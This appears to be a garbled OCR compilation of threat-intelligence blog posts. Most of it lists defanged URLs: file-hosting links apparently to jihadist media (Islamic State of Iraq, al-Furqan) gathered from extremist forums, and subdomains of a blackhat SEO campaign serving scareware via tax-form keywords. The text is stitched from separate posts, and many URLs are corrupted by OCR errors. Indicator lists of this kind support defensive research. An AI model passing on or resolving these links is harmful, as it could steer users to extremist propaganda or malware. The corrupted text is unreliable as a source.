hxxp://www.upitus.com/download.php?file=2bd87a8f 
hxxp://picshome.com/download.php?id=967C6CD91 
hxxp://uploadpalace.com/en/file/10274/dasos-rm.html 
hxxp://simpleupload.net/download/169523/dasos.rm.html 
hxxp://www.megafileupload.com/en/file/11047/dasos-rm.html 
hxxp://www.megafileupload.com/en/file/11048/dasos-rm.html 
hxxp://www4.oxedion.com/index.php/downloads/fe925fc89ffa38d7ae14f5f3704fba le? 
hxxp://www1.oxedion.com/index.php/downloads/dd3fed2a5034687feef0634fcecdb4d4? 
hxxp://www4.oxedion.com/index.php/downloads/2a7d5349b0f7fa7c04fb27b94066bbb 1? 
hxxp://www4.oxedion.com/index.php/downloads/18dd9a436deeee39c2a5f20bf0c00c9 c? 
hxxp://www6.oxedion.com/index.php/downloads/5decc90a71886d19173314195a2albf a? 
hxxp://www1.oxedion.com/index.php/downloads/4e114ab42be297838d4bf292c8698ce 5? 
hxxp://www.uploadcomet.com/download.php?file=019106059e96eb2c38a7a84ec5c58a a0 


hxxp://www.upload.pk/freeupload/download.php?file=019106059e96eb2c38 
a7a84ec5c58aa0 


hxxp://fyad.org/pk28 
hxxp://depositfiles.com/files/1822410 
hxxp://depositfiles.com/files/1822411 
hxxp://depositfiles.com/files/1822412 
hxxp://depositfiles.com/files/1822414 
hxxp://depositfiles.com/files/1825133 
hxxp://depositfiles.com/files/1824711 
hxxp://depositfiles.com/files/1824692 
hxxp://depositfiles.com/files/1822604 
hxxp://share-online.biz/dl/1/19IHZ7M35 
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hxxp://share-online.biz/dl/1/151|AG7R51 
hxxp://share-online.biz/dl/1/14GVR3T55 
hxxp://share-online.biz/dl/1/32ZQB2D41 
hxxp://www.megaupload.com/?d=ZWUIF8UI 
hxxp://www.megaupload.com/?d=JEVF2H5Z 
hxxp://www.megaupload.com/?d=FKLO54DC 
hxxp://www.megaupload.com/?d=8UFY8FQS 
hxxp://www.megaupload.com/?d=LUXR7SNL 
hxxp://www.megaupload.com/?d=5SMPNVXS 
hxxp://www.megaupload.com/?d=RQDWOSK6 
hxxp://www.megaupload.com/?d=W496QMRH 
hxxp://www.savefile.info/file/3907/dasos-3gp.html 
hxxp://www.savefile.info/file/3908/dasos-3gp.html 
hxxp://www.savefile.info/file/3909/dasos-3gp.html 
hxxp://www.savefile.info/file/3910/dasos-3gp.html 
hxxp://www.youploadit.com/file/597/dasos.3gp.html 
hxxp://www.youploadit.com/file/596/dasos.3gp.html 
hxxp://www.youploadit.com/file/595/dasos.3gp.html 
hxxp://picshome.com/download.php?id=97578E941 
hxxp://picshome.com/download.php?id=8474BC551 
hxxp://picshome.com/download.php?id=7F57C91C1 
hxxp://picshome.com/download.php?id=FF8B5FDE1 
hxxp://rapidshare.com/files/569 7644 7/dasos.3gp.html 
hxxp://rapidshare.com/files/56916410/dasos.3gp.html 
hxxp://rapidshare.com/files/56916293/dasos.3gp.html 
hxxp://rapidshare.com/files/56916369/dasos.3gp.html 
hxxp://rapidshare.com/files/56916279/dasos.3gp.html 
hxxp://rapidshare.com/files/56966845/dasos.3gp.html 
hxxp://rapidshare.com/files/56967130/dasos.3gp.html 
hxxp://rapidshare.com/files/56921716/dasos.3gp.html 
hxxp://www.upitus.com/download.php?file=Oef7b601 
hxxp://www.maxishare.net/en/file/2831/dasos-3gp.html 
hxxp://uploadpalace.com/en/file/10275/dasos-3gp.html 
hxxp://ia341226.us.archive.org/3/items/dsalgeri2/dasos.3gp 
hxxp://ia341208.us.archive.org/3/items/dsalgeri3/dasos.3gp 
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hxxp://ia341216.us.archive.org/3/items/dsalgeri4/dasos.3gp 
hxxp://ia341208.us.archive.org/2/items/dsalgeri5/dasos.3gp 
hxxp://ia341238.us.archive.org/2/items/dsalgeri6/dasos.3gp 
hxxp://ia341212.us.archive.org/1/items/dsalgeri7/dasos.3gp 
hxxp://ia341232.us.archive.org/2/items/dsalgeri8/dasos.3gp 
hxxp://ia341232.us.archive.org/2/items/dsalgeri9/dasos.3gp 
hxxp://ia341204.us.archive.org/3/items/dsalgeri10/dasos.3gp 
hxxp://www.archive.org/download/dsalgeril/dasos.3gp 
hxxp://www.archive.org/download/dsalgeri2/dasos.3gp 
hxxp://www.archive.org/download/dsalgeri3/dasos.3gp 
hxxp://www.archive.org/download/dsalgeri4/dasos.3gp 
hxxp://www.archive.org/download/dsalgeri5/dasos.3gp 
hxxp://www.archive.org/download/dsalgeri6/dasos.3gp 
hxxp://www.archive.org/download/dsalgeri7/dasos.3gp 
hxxp://www.archive.org/download/dsalgeri8/dasos.3gp 
hxxp://www.archive.org/download/dsalgeri9/dasos.3gp 
hxxp://www.archive.org/download/dsalgeril0/dasos.3gp 
hxxp://simpleupload.net/download/169522/dasos.3gp.html 
hxxp://simpleupload.net/download/169521/dasos.3gp.html 
hxxp://simpleupload.net/download/169520/dasos.3gp.html 
hxxp://simpleupload.net/download/169519/dasos.3gp.html 
hxxp://www.megafileupload.com/en/file/11050/dasos-3gp.html 
hxxp://www.megafileupload.com/en/file/11051/dasos-3gp.html 
hxxp://www.viprasys.com/host/download.php?file=216dasos.3gp 
hxxp://www.uploadcomet.com/download.php?file=f2d3daa31b660acd3c782b5a4d8fl1d ef 
hxxp://www2.oxedion.com/index.php/downloads/cca65d8f6104df78elb59a28b6c9Cc97 c? 
hxxp://www1.oxedion.com/index.php/downloads/162f3288a4a4661c30a4829a99e79Cc4 6? 
hxxp://www1.oxedion.com/index.php/downloads/263b764fe464beeb4810dcdb0e 606230? 
hxxp://www1.oxedion.com/index.php/downloads/919ad8ed8030074f48d80b64a960416 0? 
hxxp://www.upload.pk/freeupload/download.php?file=f2d3daa31b660acd3c782b5a4d8 flidef 
hxxp://depositfiles.com/files/1820765 

hxxp://picshome.com/download.php?id=F92005FC1 
hxxp://picshome.com/download.php?id=4FAF5CB31 
hxxp://picshome.com/download.php?id=6CBAFD751 
hxxp://picshome.com/download.php?id=FCOAD32B1 
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http://die-form.reychohica.com/ 
http://st-dominics-sixth-form.reychohica.com/ 
FEB) http: //profile-form.reychohica. com/ 
http://alabama-tax-form. reychohica.com/ 
http://form-onsubmit-return. reychohica.corm/ 
ayahttp://sss-form.reychohica.cam/ 
http://indiana-renter-form. reychohica.corm/ 
FEB http:/Avholesale-pillow-form.reychohica.corné 
http: renters-contract-form.reychohica. corn/ 
http://form-survey-ward. reychohica.com/ 
http://form-menu-designs.reychohica.com/ 
http: //form-petition-free. reychohica.com/ 
http://form-b?.reychohica.com/ 
http://deadlifting-form.reychohica.com/ 
http://government-form-8880. reychohica.com/ 
http: //vme-form-factor. reychohica. corm/ 
http:/form-pet-sitter.reychohica.com/ 
http://da-form-7566-word.reychohica.cam/ 
http: //how-do-eathquakes-form.reychohica.com/ 
http://company-equipment-form. reychohica. com/ 
http: //tax-form-to-download.reychohica.corn/ 

Pralittp://meeting-feedback-form. reychohica.com/ 
http://form-question-solutions.reychohica.com/ 
http: /ez-form-filler.reychohica.com/ 
http:é/e111-application-form.reychohica.com/ 
Pall http: /form-30. reychohica.com/ 
http://uk-passport-form.reychohica.com/ 
http://bigfoot-concrete-form.reychohica.cam/ 
http://utah-w4-form-i-9-form.reychohica.cam/ 
http://form-4664.reychohica.com/ 
http://access-form-control. reychohica.com/ 
http:/financial-aid-form-faf. reychohica.corm/ 
http://requirement-for-w2-form. reychohica.com/ 
http://spelling-test-form. reychohica.cor/ 
http://form-element-type. reychohica.com/ 
http:4/1040-practice-form.reychohica.com/ 

During the past 24 hours, a [1]blackhat SEO campaign has been hijacking U.S Federal Forms 
related keywords in an attempt to serve scareware. 


What’s particularly interesting about the campaign is that the Ukrainian fan club behind 
it - you didn’t even think for a second that there’s no connection with their previous cam- 
paigns, did you? - are using basic segmentation principles since the tax form keywords 
poisoning is attempting to hijack U.S traffic. Evasive practices are also in place through the 
usual http referrer check, which would only serve the scareware if the visitor is coming from 
Google.com, if not a 404 error message will appear. 


Upon clicking on the link, the user is redirected through a centralized location re- 
sponsible for managing the traffic from the thousands of subdomains/keywords used - 
honda-recycle .cn/go.php?id=2017 &key=cbafb5cb2 &p=1 - 83.133.123.113 Email: ac- 
cabj@cn.accaglobal.com. Parked on the same IP are also related malware/scareware domains: 
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hxxp://simpleupload.net/download/169446/kownd2.rar.html 
hxxp://simpleupload.net/download/169449/kownd2.rar.html 
hxxp://www.sendspace.com/file/vgj27j 
hxxp://www.megashare.com/276721 
hxxp://www.megashare.com/276736 
hxxp://www.mytempdir.com/2023657 
hxxp://www.sendspace.com/file/51u75s 
hxxp://www.mediafire.com/?e9nxg3n4yji 
hxxp://depositfiles.com/files/1820973 
hxxp://depositfiles.com/files/1821045 
hxxp://depositfiles.com/files/1821048 
hxxp://depositfiles.com/files/1820704 
hxxp://www.sendmefile.com/00579321 
hxxp://www.fileflyer.com/view/LwCniAg 
hxxp://www.furk.net/RBRBRB _18028.rar.html 
hxxp://www.megaupload.com/?d=U2XTYPZP 
hxxp://www.megaupload.com/?d=BVDYOZ9J 
hxxp://www.megaupload.com/?d=6CZUTSM2 
hxxp://www.megaupload.com/?d=OGF6092C 
hxxp://ultrashare.net/hosting/fl/O195al1c6d 
hxxp://www.furk.net/rfreeeeee _104611.rar.html 
hxxp://www.arbup.org/v/5842535/kownd3.rar.html 
hxxp://www.savefile.info/file/3854/kownd3-rar.html 
hxxp://www.savefile.info/file/3855/kownd3-rar.html 
hxxp://www.savefile.info/file/3856/kownd3-rar.html 
hxxp://www.youploadit.com/file/573/kownd3.rar.html 
hxxp://www.youploadit.com/file/572/kownd3.rar.html 
hxxp://www.youploadit.com/file/571/kownd3.rar.html 
hxxp://rapidshare.com/files/56864277/kownd3.rar.html 
hxxp://picshome.com/download.php?id=D4AB8B181 
hxxp://picshome.com/download.php?id=72224A2F1 
hxxp://www.upitus.com/download.php?file=f8d9518a 
hxxp://picshome.com/download.php?id=7D82807C1 
hxxp://d.turboupload.com/d/2044280/kownd3.rar.htm| 
hxxp://picshome.com/download.php?id=466DDBEF1 
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hxxp://rapidshare.com/files/56871599/kownd3.rar.html 
hxxp://rapidshare.com/files/56873705/kownd3.rar.html 
hxxp://rapidshare.com/files/56873654/kownd3.rar.html 
hxxp://www.4filehosting.com/file/74090/kownd3-rar.html 
hxxp://www.4filehosting.com/file/74089/kownd3-rar.html 
hxxp://www.4filehosting.com/file/74088/kownd3-rar.html 
hxxp://simpleupload.net/download/169450/kownd3.rar.html 
hxxp://simpleupload.net/download/169442/kownd3.rar.html 
hxxp://simpleupload.net/download/169441/kownd3.rar.html 
hxxp://download.file2you.net/mzdnhznaztxy/kownd3.rar.html 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=4614657 
hxxp://www.future-dld.com/download.php?dl=fd3359f31f9bc6084c4b340203023fde 
hxxp://www.future-dld.com/download.php?dl=b781ff9d0d8f9ca486c8a8eba5 727943 
hxxp://www.future-dild.com/download.php?dl=971bcc4368a8032df44061c4e51a53d8 
hxxp://www.future-dild.com/download.php?dl=d2e4497cdd275b049d049ac5b5a4d6c4 
hxxp://www.uploadcomet.com/download.php?file=ee83e5cfd0fdb69c6eld3 74bf854fel8 
hxxp://www.upload.pk/freeupload/download.php?file=ee83e5cfd0fdb69c6eld3 74bf854fe18 
hxxp://depositfiles.com/files/1820713 

hxxp://www.mytempdir.com/2023662 

hxxp://depositfiles.com/files/1820810 

hxxp://www.fileflyer.com/view/x7 9BVB] 

hxxp://www.sendmefile.com/00579324 

hxxp://ultrashare.net/hosting/fl/9f9145bfe6 
hxxp://www.megaupload.com/?d=lYOSM12D 
hxxp://www.megaupload.com/?d=MAO1D41R 
hxxp://www.megaupload.com/?d=CFNR8QEL 

hxxp://www.savefile.info/file/385 7/kowand4-rar.html 
hxxp://www.savefile.info/file/3858/kowand4-rar.html 
hxxp://www.savefile.info/file/3859/kowand4-rar.html 
hxxp://www.arbup.org/v/8314230/kowand4.rar.html 
hxxp://picshome.com/download.php?id=5B4FF1F81 
hxxp://picshome.com/download.php?id=054529BA1 
hxxp://picshome.com/download.php?id=12BC4B581 

hxxp://www. youploadit.com/file/574/kowand4.rar.html 

hxxp://www. youploadit.com/file/5 75/kowand4.rar.html 
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hxxp://www.youploadit.com/file/576/kowand4.rar.html 
hxxp://www.upitus.com/download.php?file=06b24ebb 
hxxp://picshome.com/download.php?id=EC175DCB1 
hxxp://d.turboupload.com/d/2044288/kowand4.rar.html 
hxxp://rapidshare.com/files/56866597/kowand4.rar.html 
hxxp://rapidshare.com/files/56864506/kowand4.rar.html 
hxxp://www.4filehosting.com/file/74091/kowand4-rar.html 
hxxp://www.4filehosting.com/file/74092/kowand4-rar.html 
hxxp://download.file2you.net/zzvreudvjh33/kowand4.rar.html 
hxxp://www.***filehost.com/?mode=viewupload &amp;id=2645320 
hxxp://www.uploadcomet.com/download.php?file=ad409020c374ffdc53fcbe 6ffd826f13 
hxxp://www.upload.pk/freeupload/download.php?file=ad409020c374ffdc53fcbe 6ffd826f13 
hxxp://www.archive.org/download/YaTCE/kownd2.rmvb 
hxxp://3sia.notlong.com/ 
hxxp://www.archive.org/download/3sia1/GO1.wmv 
hxxp://www.archive.org/download/3sia2/GO01.wmv 
hxxp://www.archive.org/download/3sia3/G01.wmv 
hxxp://www.archive.org/download/3sia4/GO1.wmv 
hxxp://www.archive.org/download/3sia5/GO1.wmv 
hxxp://www.archive.org/download/3sia6/GO1.wmv 
hxxp://www.archive.org/download/3sia7/GO1.wmv 
hxxp://www.archive.org/download/3sia8/GO01.wmv 
hxxp://www.archive.org/download/3sia9/GO1.wmv 
hxxp://www.archive.org/download/3sia10/GO1.wmv 
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hxxp://www. bigupload.com/d=FJUMOR1LM9 
hxxp://www.megaupload.com/?d=5NBVUV6L 
hxxp://www.megaupload.com/?d=4YMT3VDR 
hxxp://www.savefile.info/file/3919/G02-3gp.html 
hxxp://4filehosting.com/file/74177/G02-3gp.html 
hxxp://www.archive.org/download/3sial1/GO02.3gp 
hxxp://www.archive.org/download/3sia2/G02.3gp 
hxxp://www.archive.org/download/3sia3/G02.3gp 
hxxp://www.archive.org/download/3sia4/G02.3gp 
hxxp://www.archive.org/download/3sia5/GO02.3gp 
hxxp://www.archive.org/download/3sia6/GO02.3gp 
hxxp://www.archive.org/download/3sia7/GO02.3gp 
hxxp://www.archive.org/download/3sia8/GO02.3gp 
hxxp://www.archive.org/download/3sia9/GO02.3gp 
hxxp://www. youploadit.com/file/606/G02.3gp.html 
hxxp://www.archive.org/download/3sial0/G02.3gp 
hxxp://www.zshare.net/download/3758018f012353/ 
hxxp://rapidshare.com/files/5 7059830/G02.3gp.html 
hxxp://rapidshare.com/files/5 705925 7/G02.3gp.html 
hxxp://rapidshare.com/files/5 7026023/G02.3gp.html 
hxxp://www.maxishare.net/en/file/2845/GO2-3gp.html 
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hxxp://picshome.com/download.php?id=89399C0E1 
hxxp://www.upitus.com/download.php?file=4c6898c7 
hxxp://uploadpalace.com/en/file/10289/G02-3gp.html 
hxxp://ia341202.us.archive.org/2/items/3sia9/GO2.3gp 
hxxp://ia341210.us.archive.org/1/items/3sia8/GO2.3gp 
hxxp://ia341230.us.archive.org/2/items/3sia7/GO2.3gp 
hxxp://ia341220.us.archive.org/3/items/3sia6/GO2.3gp 
hxxp://ia341220.us.archive.org/2/items/3sia5/GO2.3gp 
hxxp://ia341216.us.archive.org/0/items/3sia4/GO2.3gp 
hxxp://ia341242.us.archive.org/1/items/3sia3/GO2.3gp 
hxxp://ia341208.us.archive.org/3/items/3sia2/GO02.3gp 
hxxp://ia341206.us.archive.org/2/items/3sia1/GO2.3gp 
hxxp://ia341238.us.archive.org/1/items/3sia10/G02.3gp 
hxxp://simpleupload.net/download/169874/G02.3gp.html 
hxxp://simpleupload.net/download/169878/G02.3gp.html 
hxxp://simpleupload.net/download/169877/G02.3gp.html 
hxxp://simpleupload.net/download/169880/G02.3gp.html 
hxxp://simpleupload.net/download/169881/G02.3gp.html 
hxxp://www.bestsharing.com/files/UZEWf0341043/G02.rar.html 
hxxp://www5.oxedion.com/index.php/downloads/d427ea0b3a5af38852f83b4ceca6cae b? 
hxxp://www6.oxedion.com/index.php/downloads/3ef728439316c4c35b5078611db4853 e? 
hxxp://www5.oxedion.com/index.php/downloads/100ffo5d208c6c909e478b799893093 5? 
hxxp://www4.oxedion.com/index.php/downloads/f831c21a22583665c80ed83b6 a0bfb32? 
hxxp://www1.oxedion.com/index.php/downloads/8f451a7463ca61leeael70eff84b083 04? 
hxxp://www.uploadcomet.com/download.php?file=6e6e881aa49ec6d14a5dc0f2650b3b9e 


hxxp://www.upload.pk/freeupload/download.php?file=6e6e881aa49ec6d14a5dc0f26 
50b3b9e 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEiShe75PDgczktfU01ESgkp9 jil5X1LoDDbEBNwheb3m7E4 
8Sd7xu0VpLUHhO1T_Ockb7A2RTth25LwWyORBOkqC7dyhB- 7Kcz0g 
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Folks, 


Here’s the second batch of URLs found on publicly accessible cyber jihad forums which | 
obtained using technical collection. 


Sample URLs found on publicly accessible cyber jihad forums include: 
hxxp://easyhitcounters.com/stats.php?site=murasel123 
hxxp://beta.easyhitcounters.com/counter/index.php?u=murasel123 &s=amini 
hxxp://beta.easyhitcounters.com/counter/script.php?u=murasel123 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=2377856593814884077 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=8384268744835601190 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=62932 7634725482825 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=3069861210598393774 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=7836417750206548758 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=202244468923448425 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=3790324317686492779 
hxxp://press-release.blogspot.com/2007/03/ansar-al-sunnahthe-mosels-blessed.htm | 
hxxp://press-release.blogspot.com/feeds/1965798431787005137/comments/default 
hxxp://press-release.blogspot.com/2007/03/al-furquan-media-production-presents. html 
hxxp://press-release.blogspot.com/feeds/629327634725482825/comments/default 
hxxp://press-release.blogspot.com/2007/03/islamic-state-of-iraq-news-report-of _12.html 
hxxp://press-release.blogspot.com/feeds/6223333108957779514/comments/default 
hxxp://press-release.blogspot.com/2007/03/islamic-state-of-iraq-news-report-of 06.html 
hxxp://press-release.blogspot.com/feeds/7258320896696581022/comments/default 
hxxp://press-release.blogspot.com/2007/03/islamic-state-of-iraq-brings-good-new s.html 
hxxp://press-release.blogspot.com/feeds/5253868513299620521/comments/default 
hxxp://press-release.blogspot.com/2007/03/al-furquan-media-production-presents 07.html 
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hxxp://press-release. blogspot.com/feeds/2615499371432942700/comments/default 
hxxp://press-release. blogspot.com/2007/03/islamic-state-of-iraq-news-report-of 15.html 
hxxp://press-release. blogspot.com/feeds/5387484375422580993/comments/default 
hxxp://press-release. blogspot.com/2007/03/islamic-state-of-iraq-news-report-of 04.html 
hxxp://press-release. blogspot.com/feeds/4805635884435794094/comments/default 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=3156014124011830400 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=3277442 786325323949 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=8284442439237352355 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=9118328653193929703 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=120418454215072601 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=7299926797094436263 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=7197567474212023751 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=1725679772984785880 
hxxp://press-release. blogspot.com/2007/03/islamic-state-of-irag-news-report-of. html 
hxxp://press-release. blogspot.com/feeds/32 77442 786325323949/comments/default 
hxxp://press-release. blogspot.com/2007/03/islamic-state-of-iraq-news-report-of 02.html 
hxxp://press-release. blogspot.com/feeds/8384268744835601190/comments/default 
hxxp://press-release. blogspot.com/2007/03/al-furquan-media-production-presents _06.html 
hxxp://press-release. blogspot.com/feeds/7836417750206548758/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 28.html 
hxxp://press-release.blogspot.com/feeds/2377856593814884077/comments/default 
hxxp://press-release. blogspot.com/2007/03/islamic-state-of-iraq-news-report-of 05.html 
hxxp://press-release. blogspot.com/feeds/1892553938464750472/comments/default 
hxxp://press-release. blogspot.com/2007/03/islamic-state-of-irag-capturing.html 
hxxp://press-release. blogspot.com/feeds/6859799504542387414/comments/default 
hxxp://press-release. blogspot.com/2007/03/al-qaeda-organization-in-islamic.html 
hxxp://press-release. blogspot.com/feeds/3790324317686492779/comments/default 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=6055399488378760191 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=6620492026353515897 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=8053021545357731353 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=6321645707907217428 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=156061249612410600 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=6150164024163215436 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=9073654154707720742 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=7259787357155874521 
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hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=440669589593607424 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=2129890893611427720 
hxxp://press-release.blogspot.com/2007/02/ansar-al-sunna-group-filmed-operation 28.html 
hxxp://press-release.blogspot.com/feeds/120418454215072601/comments/default 
hxxp://press-release.blogspot.com/2007/03/ansar-al-sunna-group-filmed-operation .html 
hxxp://press-release.blogspot.com/feeds/1725679772984785880/comments/default 
hxxp://press-release.blogspot.com/2007/02/alfurqan-media-production-presents _21.html 
hxxp://press-release.blogspot.com/feeds/156061249612410600/comments/default 
hxxp://press-release.blogspot.com/2007/02/ansar-al-sunna-group-filmed-operation _25.html 
hxxp://press-release.blogspot.com/feeds/3156014124011830400/comments/default 
hxxp://press-release.blogspot.com/2007/02/islamic-state-of-irag-news-report-of _6811.html 
hxxp://press-release.blogspot.com/feeds/8053021545357731353/comments/default 
hxxp://press-release.blogspot.com/2007/02/alfurqan-media-production-destruction .html 
hxxp://press-release.blogspot.com/feeds/8284442439237352355/comments/default 
hxxp://press-release.blogspot.com/2007/03/alfurqan-media-production-implementin g.htm| 
hxxp://press-release.blogspot.com/feeds/3069861210598393774/comments/default 
hxxp://press-release.blogspot.com/2007/03/al-qaeda-organization-in-islamic _06.html 
hxxp://press-release.blogspot.com/feeds/202244468923448425/comments/default 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=5565069701153573988 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=6760410036934514789 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=5373983600399644380 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=367015179968095782 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=5814372502542202064 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=955378149506686226 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=2293940747422371684 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=6114156458106434887 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=6561680149657879993 
hxxp://press-release.blogspot.com/2007/02/islamic-iraq-state-news-report-of-sta te 19.html 
hxxp://press-release.blogspot.com/feeds/9073654154707720742/comments/default 
hxxp://press-release.blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 24.html 
hxxp://press-release.blogspot.com/feeds/440669589593607424/comments/default 


hxxp://press-release.blogspot.com/2007/02/islamic-iraq-state-news-report-of-sta te 
_6530.html 


hxxp://press-release.blogspot.com/feeds/6760410036934514789/comments/default 
hxxp://press-release.blogspot.com/2007/02/alfurqan-media-production-destructing .html 
hxxp://press-release.blogspot.com/feeds/5565069701153573988/comments/default 
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hxxp://press-release. blogspot.com/2007/02/islamic-iragq-state-news-report-of-sta te _17.html 
hxxp://press-release. blogspot.com/feeds/6114156458106434887/comments/default 
hxxp://press-release. blogspot.com/2007/02/alfurqan-media-production-destruction _25.html 
hxxp://press-release. blogspot.com/feeds/6321645707907217428/comments/default 
hxxp://press-release. blogspot.com/2007/02/alfurqan-media-production-losers _17.html 
hxxp://press-release. blogspot.com/feeds/2293940747422371684/comments/default 
hxxp://press-release. blogspot.com/2007/02/alfurqan-media-production-destructing _19.html 
hxxp://press-release. blogspot.com/feeds/5373983600399644380/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 21.html 
hxxp://press-release. blogspot.com/feeds/5814372502542202064/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 27.html 
hxxp://press-release. blogspot.com/feeds/6150164024163215436/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 23.html 
hxxp://press-release. blogspot.com/feeds/6055399488378760191/comments/default 
hxxp://press-release. blogspot.com/2007/03/islamic-state-of-iraq-news-report-of 03.html 
hxxp://press-release. blogspot.com/feeds/7197567474212023751/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 8744.html 
hxxp://press-release. blogspot.com/feeds/7299926797094436263/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 20.html 
hxxp://press-release. blogspot.com/feeds/6620492026353515897/comments/default 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=7607273363729385864 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=8267725910618906474 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=2109255454734459966 
hxxp://www.blogger.com/post-edit.g?blogID=23370068 &postID=3635843790037839033 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 26.html 
hxxp://press-release. blogspot.com/feeds/9118328653193929703/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraq-news-report-of 22.html 
hxxp://press-release. blogspot.com/feeds/6561680149657879993/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-iragq-state-news-report-of-sta te _16.html 
hxxp://press-release. blogspot.com/feeds/2109255454734459966/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-iraq-state-news-report-of-sta te 416.html 
hxxp://press-release. blogspot.com/feeds/7607273363729385864/comments/default 
hxxp://press-release. blogspot.com/2007/02/alfurqan-media-production-losers.htm| 
hxxp://press-release. blogspot.com/feeds/8267725910618906474/comments/default 
hxxp://press-release. blogspot.com/2007/02/islamic-state-of-iraqg-news-report-of. html 
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hxxp://www.w-n-n.com/up/dd _NEW.rmvb 
hxxp://www.badongo.com/file/2232018 
hxxp://www.badongo.com/file/2231762 
hxxp://www.badongo.com/file/2231764 
hxxp://www.MegaShare.com/110729 
hxxp://www.MegaShare.com/110710 
hxxp://www.MegaShare.com/110706 
hxxp://www.mytempdir.com/1215712 
hxxp://s26.quicksharing.com/v/3493068/.html 
hxxp://www.zshare.net/download/rm-rmvb.html 
hxxp://www.zshare.net/download/rm-rmvb-wr0.html 
hxxp://www.archive.org/download/coetWQ9/r1.rmvb 
hxxp://ia310906.us.archive.org/1/items/coetWQ9/r1.rmvb 
hxxp://www.MegaShare.com/110696 
hxxp://www.badongo.com/file/2231404 
hxxp://www.badongo.com/file/2231410 
hxxp://files.filefront.com//;6740017;;/ 
hxxp://www.zshare.net/download/3gpp-3gp-ca0.html 
hxxp://www.zshare.net/download/3gpp-3gp-v8m.html 
hxxp://www.zshare.net/download/3gpp-3gp-t22.html 
hxxp://www.archive.org/download/coetWQ9/4g.3gp 
hxxp://ia310906.us.archive.org/1/items/coetWQ9/4g.3gp 


1. bttps://blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEhGpIKTTUobx30yEfHEDxoHOhD- g2TO3GNViukfpJ7whtxZ 
nk7SFal-H6ixgcoHBkOrbrud5_cD5WGVoKRdJ95-aCrIid8iycdIle 
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Folks, 


Here’s the second batch of URLs found on publicly accessible cyber jihad forums which | 
obtained using technical collection. 


Sample URLs found on publicly accessible cyber jihad forums include: 


hxxp://www.mjaals.net/vb/ 

hxxp://www.vb2plus.com 

hxxp://xslt.alexa.com/site _stats/js/s/a?url=muslIm.net 

hxxp://www.ahlalhdeeth.com/vb/showthread.php?t=79078 

hxxp://www.ahlalhdeeth.com/vb/showthread.php?t= 79580 

hxxp://www.archive.org/download/ybky2/ybky2.wmv 

hxxp://www.archive.org/download/aboishak/ybky.wmv 

hxxp://www.alboraq.info/ 

hxxp://www.basaernews.com 

hxxp://www.iragirabita.org/ 

hxxp://www.labaik-africa.org/ 

hxxp://www.islamprophet.ws/ 

hxxp://76news.net/ 

hxxp://www.iraq-amsi.org 

hxxp://www.Rabania.com 

hxxp://www.rabania.com/media/subcat.php?subcatid=107 

hxxp://c3.amazingcounters.com/counter.php?i=774345 &amp;c=2323348 

hxxp://khayma.com/tajweed/qmoton.htm 

hxxp://abohafs.110mb.com/ 

hxxp://abohafs.110mb.com/hadochi/ 

hxxp://elheweny.org/media/vedio/gom3a _6-7-2007.wmv 

hxxp://alheweny.wh150.com/media/vedio/khotab/shart eltamken _2.wmv 

hxxp://alheweny.wh150.com/media/vedio/khotab/shart eltamken 3 _3-8-2007.wmv 

hxxp://www.zshare.net/download/30729545cf38de/ 

hxxp://upload.9q9q.net/file/PNIiGD843/——-.rar.html 

hxxp://ia350643.us.archive.org/1/items/prey144/eha.rmvb 

hxxp://www.archive.org/download/prey144/eha.rmvb 

